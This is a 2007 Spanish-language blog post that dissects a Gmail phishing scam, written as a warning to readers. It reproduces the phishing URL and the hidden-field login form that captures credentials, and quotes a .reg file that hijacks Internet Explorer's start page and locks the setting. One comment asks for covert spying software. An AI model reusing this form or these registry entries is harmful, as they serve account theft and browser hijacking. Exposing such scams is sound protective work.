Geek the Planet


Seguridad no image

Published on junio 25th, 2007 | by Angelfire

6

Rastreo a Xploits de Gmail

Hacia muchisimos años no veia estas ridiculeses, de nuevo los dichosos xploits para robar contraseñas de correos han vuelto, como cosa rara este del gusanito, común, típico y fácil de reconocer, a llegado a mi correo y he decido investigarlo a fondo.

xploit gmail

Lo primer que hice fue darle click a la “postal” para ver en que servidor se encontraba hospedado el script, la falsificación es casi perfecta, como siempre sucede, nos pediran que ingresemos la contraseña de nuestra cuenta para poder verla:

http://emilyhot.com/by107fd.bay107.hotmail.msn.com.cgibin.hotmail.curmbox.000010000.2d0000.

2d0000.2d00002d000000000001000000000000000000000000012777885554444200passport
//logearse.php?fake=amistad&nombre=xxxxxx&correo=xxxxxxx@gmail.com&retorno=xxxxxx@gmail.com
&Postal= &nombre_from=xxxxxx&correo_from=xxxxxx@hotmail.com&mensaje=solo+para+ti

Me doy cuenta de varias cosas:

  1. hospedada en http://emilyhot.com
  2. logearse.php?fake —-> Les dice algo la palabra fake?
  3. retorno=xxxxxx@gmail.com
  4. from=xxxxxx@gmail.com

Osea, mas fácil de ver imposible…

Así luce nuestro inicio de sesion:

inicio sesion xploit

Y así el código del formulario:

<form style="margin:0px;" action="fake.php?fake=amistad" method="POST"> <input id="i0322" name="correo" type="hidden" value="xxxxxx@gmail.com" /> <input name="fake" type="hidden" value="amistad" /> <input name="retorno" type="hidden" value="xxxxxx@gmail.com" /> </form>

Por acá termina el fake del xploit, ahora veamos el fake de la página, como habia mencionado anteriormente, el xploit se encuentra hospedado en http://emilyhot.com/, para muchos la página luce muy bien, la niña es hermosa y pues nada raro; pues como siempre no todo lo que brilla es oro, y que te ofrezcan acceso gratis es casi imposible:

acceso gratis

¿Por qué imposible?, fácil, porque esta página es solo un fake del site original de Emily18, que es este: http://www.emily18.com/, que como podrán verificar el acceso gratis no aparece por ningun lado, y lo peor, el dichoso fake esta hecho con frontpage:

<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">

Siguiendo con el fake y dirigiendome clickeo en “acceso gratis” me encuentro con las dichosas intrucciones:

instrucciones

Donde nos piden que nos descarguemos el siguiente archivo Zona-Fullsex.reg, supuestamente este archivito es para poder tener identificado tu pc frente te a su poderosa zona erótica, FALSO, que tiene el archivito:

REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.espiamsn.com"
"Window Title"="EspiaMSN.Com - Revelador de contraseñas Hotmail, Yahoo, Gmail, Aol - Mail Hack - Ingenieria avanzada para correos - Captor de Claves - Bloqueador de Hotmail - Localizador de Ciudad - Ultra espionaje avanzado - Navegacion anónima - Hackear MSN - Hack Messenger - hackear Hotmail - Hack Hotmail - Hackear Yahoo - Hack Yahoo - Hackear Aol - Hack Aol - Espias Satelitales"
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\control panel]
"HomePage"=dword:00000001

No creo que necesitemos nuestra contraseña del correo para poder acceder al sitio de nuestra hermosa amiguita Emily.

Que es EspiaMSN:

Bienvenidos al descifrador de contraseñas INTERNACIONAL, el mas importante para la obtención de contraseñas, mediante programas espías, ingeniería avanzada, descifradores y recuperadores de contraseñas (Contraseñas DE HOTMAIL-YAHOO-GMAIL-AOL) y cualquier correo que usted desee espiar. No se deje engañar por programas de descarga gratuita en paginas de hacker, que vienen habitualmente con virus guardados

Así que de una vez les advierto, MUCHO OJO CON ESTO, ES GENTE INESCRUPULOSA INTENTA ROBAR VUESTRAS CUENTAS DE CORREO, COMO DIJE ANTERIORMENTE NO TODO LO QUE BRILLA ES ORO.

Si conocen otro xploit agradezco me envien una copia para ver su origen.

Tags: ,


About the Author

Systems Engineering, Computer Systems Specialist, Social Engineering Specialist. Social Media Analyzer. Usability and SEO enthusiasm (Este es mi perfil de Twitter...)



6 Responses to Rastreo a Xploits de Gmail

  1. Fidel says:

    Bacano el rastreo que le haces a esa vuelta y a unque entiendo poco me parece chévere.

  2. gEEK says:

    Gracias, digamos que es algo de labor social, es bueno ayudar un poco en lo que se sabe, aunque no tiene nada de raro, es como ir desenredando la telaraña.

  3. alguien says:

    mire esta pagina y sabra todos los xploits que hay…http://www.hackphreik.com

    saludos

  4. gEEK says:

    Gracias alguien, veré que puedo encontrar.

  5. Carlos says:

    me parece genial.. lo q¡ hace,, pero yo kiero un programa q’ no se tan obio,, espero q’ me envies algo,,, solo para espionaje,., un software,, eficaf,, tu eres el master …

  6. juan says:

    Hola, se que es un poco tarde para escribir, pero tengo una preguntilla…chevere lo del rastreo del sitio, pero mi pregunta es como saber quien envia el xploit…osea a mi me han llegado varios de alguien que obviamente no reconozco, mi pregunta es como saco la ip de la persona que lo envia no de la web que los carga….gracias

Back to Top ↑